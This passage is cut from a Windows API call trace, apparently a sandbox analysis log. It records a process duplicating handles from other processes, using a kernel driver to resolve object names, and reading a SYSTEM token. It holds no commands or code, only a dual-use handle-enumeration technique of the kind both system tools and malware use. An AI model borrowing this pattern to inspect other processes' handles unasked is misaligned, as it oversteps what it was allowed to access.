ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0182.034] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x88) returned 0x310b70 [0182.034] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x310b70, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0x310b70, ReturnLength=0x0) returned 0x0 [0182.034] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x310b70 | out: hHeap=0x2d0000) returned 1 [0182.034] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x1e70090 [0182.034] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e70090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e70090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0182.034] PsLookupProcessByProcessId (in: ProcessId=0x91c, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0182.034] PsAcquireProcessExitSynchronization () returned 0x0 [0182.034] KeStackAttachProcess (in: PROCESS=0xfffffa80030d1b30, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa80030d1b30, ApcState=0xfffff88002aab5d0) [0182.034] ObReferenceObjectByHandle (in: Handle=0xa4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8003a19c90, HandleInformation=0x0) returned 0x0 [0182.034] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0182.034] PsReleaseProcessExitSynchronization () returned 0x2 [0182.034] ObfDereferenceObject (Object=0xfffffa80030d1b30) returned 0x22 [0182.034] ObQueryNameString (in: Object=0xfffffa8003a19c90, ObjectNameInfo=0xfffffa800313b044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800313b044, ReturnLength=0xfffff88002aab550) returned 0x0 [0182.034] ObfDereferenceObject (Object=0xfffffa8003a19c90) returned 0x2 [0182.034] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0182.035] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x1e70090 | out: hHeap=0x2d0000) returned 1 [0182.035] CloseHandle (hObject=0xc0) returned 1 [0182.035] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x91c) returned 0xc0 [0182.035] GetCurrentProcess () returned 0xffffffffffffffff [0182.035] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0xa0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xbc) returned 1 [0182.035] CloseHandle (hObject=0xc0) returned 1 [0182.035] NtQueryObject (in: Handle=0xbc, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0182.035] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x88) returned 0x310b70 [0182.035] NtQueryObject (in: Handle=0xbc, ObjectInformationClass=0x2, ObjectInformation=0x310b70, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0x310b70, ReturnLength=0x0) returned 0x0 [0182.035] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x310b70 | out: hHeap=0x2d0000) returned 1 [0182.035] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x1e70090 [0182.035] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e70090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e70090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0182.035] PsLookupProcessByProcessId (in: ProcessId=0x91c, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0182.035] PsAcquireProcessExitSynchronization () returned 0x0 [0182.035] KeStackAttachProcess (in: PROCESS=0xfffffa80030d1b30, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa80030d1b30, ApcState=0xfffff88002aab5d0) [0182.035] ObReferenceObjectByHandle (in: Handle=0xa0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8003264840, HandleInformation=0x0) returned 0x0 [0182.035] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0182.035] PsReleaseProcessExitSynchronization () returned 0x2 [0182.035] ObfDereferenceObject (Object=0xfffffa80030d1b30) returned 0x22 [0182.035] ObQueryNameString (in: Object=0xfffffa8003264840, ObjectNameInfo=0xfffffa800313c044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800313c044, ReturnLength=0xfffff88002aab550) returned 0x0 [0182.035] ObfDereferenceObject (Object=0xfffffa8003264840) returned 0x3 [0182.035] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0182.036] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x1e70090 | out: hHeap=0x2d0000) returned 1 [0182.036] CloseHandle (hObject=0xbc) returned 1 [0182.036] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x91c) returned 0xbc [0182.036] GetCurrentProcess () returned 0xffffffffffffffff [0182.036] DuplicateHandle (in: hSourceProcessHandle=0xbc, hSourceHandle=0x9c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0182.036] CloseHandle (hObject=0xbc) returned 1 [0182.036] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0182.036] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x80) returned 0x310b70 [0182.036] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x310b70, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0x310b70, ReturnLength=0x0) returned 0x0 [0182.036] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x310b70 | out: hHeap=0x2d0000) returned 1 [0182.036] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x1e70090 [0182.037] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e70090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e70090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0182.037] PsLookupProcessByProcessId (in: ProcessId=0x91c, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0182.037] PsAcquireProcessExitSynchronization () returned 0x0 [0182.037] KeStackAttachProcess (in: PROCESS=0xfffffa80030d1b30, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa80030d1b30, ApcState=0xfffff88002aab5d0) [0182.037] ObReferenceObjectByHandle (in: Handle=0x9c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffff8a003bf7430, HandleInformation=0x0) returned 0x0 [0182.037] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0182.037] PsReleaseProcessExitSynchronization () returned 0x2 [0182.037] ObfDereferenceObject (Object=0xfffffa80030d1b30) returned 0x22 [0182.037] ObQueryNameString (in: Object=0xfffff8a003bf7430, ObjectNameInfo=0xfffffa800313d044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800313d044, ReturnLength=0xfffff88002aab550) returned 0x0 [0182.037] ObfDereferenceObject (Object=0xfffff8a003bf7430) returned 0x2 [0182.037] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0182.037] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x1e70090 | out: hHeap=0x2d0000) returned 1 [0182.037] CloseHandle (hObject=0xc0) returned 1 [0182.037] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xad8) returned 0xc0 [0182.037] GetCurrentProcess () returned 0xffffffffffffffff [0182.037] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0xc4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xbc) returned 1 [0182.037] CloseHandle (hObject=0xc0) returned 1 [0182.037] NtQueryObject (in: Handle=0xbc, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0182.037] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x78) returned 0x2f4c70 [0182.038] NtQueryObject (in: Handle=0xbc, ObjectInformationClass=0x2, ObjectInformation=0x2f4c70, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2f4c70, ReturnLength=0x0) returned 0x0 [0182.038] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4c70 | out: hHeap=0x2d0000) returned 1 [0182.038] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x1e70090 [0182.038] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e70090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e70090*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0182.038] PsLookupProcessByProcessId (in: ProcessId=0xad8, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0182.038] PsAcquireProcessExitSynchronization () returned 0x0 [0182.038] KeStackAttachProcess (in: PROCESS=0xfffffa80022e6350, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa80022e6350, ApcState=0xfffff88002aab5d0) [0182.038] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0182.038] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0182.038] PsReleaseProcessExitSynchronization () returned 0x2 [0182.038] ObfDereferenceObject (Object=0xfffffa80022e6350) returned 0x21 [0182.038] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa8003179044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003179044, ReturnLength=0xfffff88002aab550) returned 0x0 [0182.038] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0x12 [0182.038] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0182.038] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x1e70090 | out: hHeap=0x2d0000) returned 1 [0182.038] CloseHandle (hObject=0xbc) returned 1 [0182.038] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x98c) returned 0xbc [0182.038] GetCurrentProcess () returned 0xffffffffffffffff [0182.038] DuplicateHandle (in: hSourceProcessHandle=0xbc, hSourceHandle=0x34, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0182.039] CloseHandle (hObject=0xbc) returned 1 [0182.039] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0182.039] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x78) returned 0x2f4c70 [0182.039] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x2f4c70, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2f4c70, ReturnLength=0x0) returned 0x0 [0182.039] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4c70 | out: hHeap=0x2d0000) returned 1 [0182.039] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x98c) returned 0xbc [0182.039] GetCurrentProcess () returned 0xffffffffffffffff [0182.039] DuplicateHandle (in: hSourceProcessHandle=0xbc, hSourceHandle=0x34, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x8, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0182.039] CloseHandle (hObject=0xbc) returned 1 [0182.039] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12dbc0, TokenInformationLength=0x800, ReturnLength=0x12d4b4 | out: TokenInformation=0x12dbc0, ReturnLength=0x12d4b4) returned 1 [0182.039] LookupAccountSidW (in: lpSystemName="", Sid=0x12dbd0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12d9b0, cchName=0x12d4bc, ReferencedDomainName=0x12d7a0, cchReferencedDomainName=0x12d4b8, peUse=0x12d4e8 | out: Name="SYSTEM", cchName=0x12d4bc, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12d4b8, peUse=0x12d4e8) returned 1 [0182.042] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0xa, TokenInformation=0x12d568, TokenInformationLength=0x38, ReturnLength=0x12d4b4 | out: TokenInformation=0x12d568, ReturnLength=0x12d4b4) returned 1 [0182.042] GetLastError () returned 0x32 [0182.042] SetLastError (dwErrCode=0x32) [0182.042] GetLastError () returned 0x32 [0182.042] SetLastError (dwErrCode=0x32) [0182.042] CloseHandle (hObject=0xc4) returned 1 [0182.042] CloseHandle (hObject=0xc0) returned 1 [0182.042] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x9f4) returned 0xc0 [0182.042] GetCurrentProcess () returned 0xffffffffffffffff [0182.042] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0x1d0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0182.042] CloseHandle (hObject=0xc0) returned 1 [0182.042] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0182.042] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x78) returned 0x2f4c70 [0182.042] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x2f4c70, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2f4c70, ReturnLength=0x0) returned 0x0 [0182.043] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4c70 | out: hHeap=0x2d0000) returned 1 [0182.043] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x1e705e0 [0182.043] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e705e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e705e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0182.043] PsLookupProcessByProcessId (in: ProcessId=0x9f4, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0182.043] PsAcquireProcessExitSynchronization () returned 0x0 [0182.043] KeStackAttachProcess (in: PROCESS=0xfffffa8002089b30, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa8002089b30, ApcState=0xfffff88002aab5d0) [0182.043] ObReferenceObjectByHandle (in: Handle=0x1d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8003a7bd70, HandleInformation=0x0) returned 0x0 [0182.043] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0182.043] PsReleaseProcessExitSynchronization () returned 0x2 [0182.043] ObfDereferenceObject (Object=0xfffffa8002089b30) returned 0x39 [0182.043] ObQueryNameString (in: Object=0xfffffa8003a7bd70, ObjectNameInfo=0xfffffa800317a044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800317a044, ReturnLength=0xfffff88002aab550) returned 0x0 [0182.043] ObfDereferenceObject (Object=0xfffffa8003a7bd70) returned 0x2 [0182.043] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0182.043] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x1e705e0 | out: hHeap=0x2d0000) returned 1 [0182.043] CloseHandle (hObject=0xc4) returned 1 [0182.043] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4bc) returned 0xc4 [0182.043] GetCurrentProcess () returned 0xffffffffffffffff [0182.043] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0x370, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0x0) returned 0 [0182.043] CloseHandle (hObject=0xc4) returned 1 [0182.044] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x88) returned 0x310b70 [0182.044] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335004c, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x310b70, nOutBufferSize=0x88, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x310b70*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0182.044] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff88002aab5a8 | out: Process=0xfffff88002aab5a8) returned 0x0 [0182.044] PsAcquireProcessExitSynchronization () returned 0x0 [0182.044] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff88002aab5c8 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff88002aab5c8) [0182.044] ObReferenceObjectByHandle (in: Handle=0x370, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab5b0, HandleInformation=0x0 | out: Object=0xfffff88002aab5b0*=0xfffffa80039b2ef0, HandleInformation=0x0) returned 0x0 [0182.044] PsReleaseProcessExitSynchronization () returned 0x2 [0182.044] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0182.044] ZwQueryObject (in: Handle=0x370, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0xfffff88002aab5a4 | out: ObjectInformation=0x0, ReturnLength=0xfffff88002aab5a4) returned 0xc0000004 [0182.044] ExAllocatePoolWithTag (PoolType=0x1, NumberOfBytes=0x80, Tag=0x58637250) returned 0xfffff8a00398e820 [0182.044] ZwQueryObject (in: Handle=0x370, ObjectInformationClass=0x2, ObjectInformation=0xfffff8a00398e820, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0xfffff8a00398e820, ReturnLength=0x0) returned 0x0 [0182.044] ExFreePoolWithTag (P=0xfffff8a00398e820, Tag=0x0) [0182.044] ObfDereferenceObject (Object=0xfffffa80039b2ef0) returned 0x2 [0182.044] KeUnstackDetachProcess (ApcState=0xfffff88002aab5c8) [0182.044] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0182.044] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x310b70 | out: hHeap=0x2d0000) returned 1 [0182.044] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x1e705e0 [0182.044] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e705e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e705e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0182.044] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0182.044] PsAcquireProcessExitSynchronization () returned 0x0 [0182.044] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff88002aab5d0) [0182.044] ObReferenceObjectByHandle (in: Handle=0x370, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa80039b2ef0, HandleInformation=0x0) returned 0x0 [0182.044] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0182.044] PsReleaseProcessExitSynchronization () returned 0x2 [0182.045] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0182.045] ObQueryNameString (in: Object=0xfffffa80039b2ef0, ObjectNameInfo=0xfffffa800317b044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800317b044, ReturnLength=0xfffff88002aab550) returned 0x0 [0182.045] ObfDereferenceObject (Object=0xfffffa80039b2ef0) returned 0x2 [0182.045] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0182.045] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x1e705e0 | out: hHeap=0x2d0000) returned 1 [0182.045] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4bc) returned 0xc4 [0182.045] GetCurrentProcess () returned 0xffffffffffffffff [0182.045] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0x150, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0x0) returned 0 [0182.045] CloseHandle (hObject=0xc4) returned 1 [0182.045] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x88) returned 0x310b70 [0182.045] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335004c, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x310b70, nOutBufferSize=0x88, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x310b70*, lpBytesReturned=0x12d450*=0x1c, lpOverlapped=0x0) returned 1 [0182.045] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff88002aab5a8 | out: Process=0xfffff88002aab5a8) returned 0x0 [0182.045] PsAcquireProcessExitSynchronization () returned 0x0 [0182.045] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff88002aab5c8 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff88002aab5c8) [0182.045] ObReferenceObjectByHandle (in: Handle=0x150, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab5b0, HandleInformation=0x0 | out: Object=0xfffff88002aab5b0*=0xfffff8a001057e80, HandleInformation=0x0) returned 0x0 [0182.045] PsReleaseProcessExitSynchronization () returned 0x2 [0182.045] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0182.045] ZwQueryObject (in: Handle=0x150, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0xfffff88002aab5a4 | out: ObjectInformation=0x0, ReturnLength=0xfffff88002aab5a4) returned 0xc0000004 [0182.046] ExAllocatePoolWithTag (PoolType=0x1, NumberOfBytes=0x80, Tag=0x58637250) returned 0xfffff8a00398e820 [0182.046] ZwQueryObject (in: Handle=0x150, ObjectInformationClass=0x2, ObjectInformation=0xfffff8a00398e820, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0xfffff8a00398e820, ReturnLength=0x0) returned 0x0 [0182.046] ExFreePoolWithTag (P=0xfffff8a00398e820, Tag=0x0) [0182.046] ObfDereferenceObject (Object=0xfffff8a001057e80) returned 0x2 [0182.046] KeUnstackDetachProcess (ApcState=0xfffff88002aab5c8) [0182.046] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0182.046] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x310b70 | out: hHeap=0x2d0000) returned 1 [0182.046] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x1e705e0 [0182.046] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e705e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e705e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0182.046] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0182.046] PsAcquireProcessExitSynchronization () returned 0x0 [0182.046] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff88002aab5d0) [0182.046] ObReferenceObjectByHandle (in: Handle=0x150, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffff8a001057e80, HandleInformation=0x0) returned 0x0 [0182.046] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0182.046] PsReleaseProcessExitSynchronization () returned 0x2 [0182.046] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0182.046] ObQueryNameString (in: Object=0xfffff8a001057e80, ObjectNameInfo=0xfffffa800317c044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800317c044, ReturnLength=0xfffff88002aab550) returned 0x0 [0182.046] ObfDereferenceObject (Object=0xfffff8a001057e80) returned 0x2 [0182.046] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0182.047] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x1e705e0 | out: hHeap=0x2d0000) returned 1 [0182.047] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x370) returned 0xc4 [0182.047] GetCurrentProcess () returned 0xffffffffffffffff [0182.047] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0x9b8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0182.047] CloseHandle (hObject=0xc4) returned 1 [0182.047] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0182.047] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2f4c70 [0182.047] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x2f4c70, ObjectInformationLength=0x70, ReturnLength=0x0 | out: ObjectInformation=0x2f4c70, ReturnLength=0x0) returned 0x0 [0182.047] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4c70 | out: hHeap=0x2d0000) returned 1 [0182.047] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x1e705e0 [0182.047] DeviceIoControl (in: 